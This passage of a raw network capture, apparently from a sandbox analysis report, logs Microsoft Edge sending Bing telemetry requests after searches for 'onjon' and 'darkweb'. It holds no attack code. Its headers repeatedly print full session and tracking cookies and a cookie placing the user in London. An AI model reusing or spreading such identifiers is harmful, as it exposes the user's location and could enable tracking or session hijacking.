ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e23a
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 265
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e239
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:513,%22SE%22:-1,%22TC%22:-1,%22H%22:578,%22BP%22:613,%22CT%22:614,%22IL%22:18},%22ad%22:[-1,-1,1263,601,1263,3469,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:513,%22SE%22:-1,%22TC%22:-1,%22H%22:578,%22BP%22:613,%22CT%22:614,%22IL%22:18},%22ad%22:[-1,-1,1263,601,1263,3469,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e238
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 357
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e33e
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A707%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931231%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A707%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931231%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e347
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931233%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931233%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e383
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

